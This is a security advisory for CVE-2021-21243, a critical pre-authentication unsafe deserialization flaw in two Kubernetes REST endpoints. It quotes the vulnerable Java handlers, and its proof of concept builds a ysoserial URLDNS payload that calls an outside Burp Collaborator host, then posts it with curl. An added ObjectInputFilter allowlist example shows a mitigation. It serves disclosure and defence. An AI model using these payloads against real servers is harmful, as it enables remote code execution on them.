Pre-Auth Unsafe Deserialization on KubernetesResource

Critical
robinshine published GHSA-9mmq-fm8c-q4fv Jan 11, 2021

Package

No package listed

Affected versions

<4.0.2

Patched versions

4.0.3

Description

Impacts

A Kubernetes REST endpoint exposes two methods that deserialize untrusted data from the request body:

    // Vulnerable (pre-4.0.3) handler: the raw request body is handed straight
    // to Java deserialization with no authentication or authorization check.
    @Path("/allocate-job-caches")
    @Consumes(MediaType.APPLICATION_OCTET_STREAM)
    @Produces(MediaType.APPLICATION_OCTET_STREAM)
    @POST
    public byte[] allocateJobCaches(byte[] cacheAllocationRequestBytes) {
        CacheAllocationRequest allocationRequest =
                (CacheAllocationRequest) SerializationUtils.deserialize(cacheAllocationRequestBytes);
        // ... remainder of the method not shown in the advisory

and

    // Second vulnerable handler: same pattern, the body is deserialized
    // before getJobToken() or any other check is consulted.
    @Path("/report-job-caches")
    @Consumes(MediaType.APPLICATION_OCTET_STREAM)
    @POST
    public void reportJobCaches(byte[] cacheInstanceBytes) {
        @SuppressWarnings("unchecked")
        Collection<CacheInstance> cacheInstances = (Collection<CacheInstance>) SerializationUtils
                .deserialize(cacheInstanceBytes);
        jobManager.reportJobCaches(getJobToken(), cacheInstances);
    }

These endpoints do not enforce any authentication or authorization checks.

PoC

    java -jar ~/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://pzs6r9v6ryn8go4gnk26o91xqowgk5.burpcollaborator.net > deser_payload.bin
    curl -H "Content-Type:application/octet-stream" --data-binary @deser_payload.bin http://localhost:6610/rest/k8s/allocate-job-caches
    java -jar ~/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://pzs6r9v6ryn8go4gnk26o91xqowgk5.burpcollaborator.net > deser_payload.bin
    curl -H "Content-Type:application/octet-stream" --data-binary @deser_payload.bin http://localhost:6610/rest/k8s/report-job-caches

This issue may lead to pre-authentication remote code execution (RCE).

Patches

This issue was fixed in 4.0.3 by no longer using Java deserialization on the KubernetesResource side.
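Where an endpoint cannot drop Java serialization entirely, the next-best control is a JEP 290 ObjectInputFilter allowlist that rejects every class except the one expected request type before its fields are read. The following is an added, self-contained illustration of that pattern and is not the project's own fix (which removed deserialization, as stated above); the class shape, field names and filter pattern are assumptions.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.HashMap;

public class FilteredDeserialization {

    // Hypothetical stand-in for the request type the endpoint expects.
    static final class CacheAllocationRequest implements Serializable {
        private static final long serialVersionUID = 1L;
        final long jobId;
        final int cacheCount;
        CacheAllocationRequest(long jobId, int cacheCount) {
            this.jobId = jobId;
            this.cacheCount = cacheCount;
        }
    }

    // Allowlist: only the expected request class may be deserialized; every
    // other class in the stream is rejected with InvalidClassException.
    private static final ObjectInputFilter ALLOWLIST = ObjectInputFilter.Config
            .createFilter("FilteredDeserialization$CacheAllocationRequest;!*");

    static CacheAllocationRequest readRequest(byte[] body) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(body))) {
            in.setObjectInputFilter(ALLOWLIST); // must be set before the first readObject()
            return (CacheAllocationRequest) in.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Constructed legitimate body: passes the filter.
        CacheAllocationRequest req = readRequest(serialize(new CacheAllocationRequest(42L, 2)));
        System.out.println("accepted: job " + req.jobId + ", caches " + req.cacheCount);
        // Any other class, here a plain HashMap standing in for an attacker-chosen
        // object graph, is rejected before any of its fields are processed.
        HashMap<String, String> other = new HashMap<>();
        other.put("k", "v");
        try {
            readRequest(serialize(other));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Run with `java FilteredDeserialization.java` (Java 11 or later); the second call fails with "filter status: REJECTED" instead of reaching the unknown class's deserialization logic.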

Credits

This issue was discovered by @pwntester

Severity

Critical

CVE ID

CVE-2021-21243

Weaknesses

No CWEs